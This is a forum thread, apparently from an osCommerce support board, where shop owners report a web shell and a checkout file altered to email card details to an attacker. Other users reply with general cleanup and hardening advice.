Hacked, Card Details Stolen Etc

[steveboy]

Hi all, I'm a little cheesed off, I discovered that my checkout confirmation file had been hacked to include an email script to email card details to a hacker..

 

I 1st noticed something amiss when I spotted some strange files in the catalog folder with these filenames..

 

goog1e238159a6ca536d

googlee653c404cfc1

googleb6a05781bc64

 

Inside these files is a comment at the top saying "Web Shell by boff".

 

Having a feeling what a hacker would be after I straight away checked the dates of files and noticed checkout conf had been modified much more recently than I had so I went in and deleted the email part that was sending the card details to this asshole.

 

Has anybody got any idea how they managed to gain access?? I also found a single file filemanager which had been uploaded by him on the same date which I guess he used to upload the other files.

 

So after my cleanup i'm left with a little issue.. 100s of files keep appearing in the catalog folder each day, they are empty apart from a single digit number.. Here is what it looks like..

 

 

Nomatter how many times I delete these files they come back one at a time until there are 800-900 of them.

 

I'm sure this has happened to somebody else, if it has can you advise what to do about it?

 

Thanks

[SirYarquest]

Well I to had issues a few months ago. I did everything Google and GoDaddy told me to do, removing files, etc. But they still wouldn't confirm my site was safe. I'm thinking it's because the same files were showing up, just like you. It was so bad, I killed the hosting, moved it to another server, decided to switch to Zen-Cart because my buddies told me that there we're security issues with OSC. I was on an old version, so I thought that was the issue. Well Zen-Cart didn't work at all. Frustrated, I decided to come back here. Sorry for being so long winded, but now after reading your post from today, I'm worried I'm going to get hacked again.

 

Here's what I do know, they inserted a script into my site, in several places. I do know since 07-25-10 my site has had 9000 plus hits. But my site has been down since then, so it must be hackers and not customers. I never had that kind of traffic before. I hate this, I certainly hope we get some help on here.

 

Tony (sirYarquest)

[Guest]

Steve / Tony,

 

READ the security forum on how to secure your admin and catalog.

 

Steve, you will need to restore from a known 'clean' backup of your site and then secure it. Also, if your a religious man, pray NONE of your customers report the security breach because the fines are hefty and it is a federal offense to store credit card information on your server if you are not PCI DSS Compliant.

 

 

Chris

[steveboy]

Thanks for the replies,

 

Any ideas on what is generating the files as in the screenshot?

[Guest]

Steve,

 

You are going to have to search all files for malicious code and also look for anomalous files that the hacker could be using to gain access to your website.

 

It's a long, tiresome process but it is necessary to ensure the site is clean and secure.

 

 

Chris

[FIMBLE]

The files can be anywhere in your fileset, look for strange .php files (names) compare your fileset with another osCommerce fileset then check the files that differ

I have found these files in the images folder with an htaccess file to redirect, not only the one instance but many, a new folder with many many hack files in it named innocently so yuo might not notice them.

The hackers are crafty sods!

I found a hack in a payment module file a week or so ago, that redirected payment details to a hacker, it would be best to delete the whole lot and restore from your clean backup to ensure all has gone.

the usual rename your admin, remove the file_manager.php and the define_language.php from your admin, check you file permissions, change your passwords, and if you are storing Credit card details stop doing that now or you could find yourself in trouble with the law, the only payment method i am aware of is the Credid card module for testing purposes only.

Nic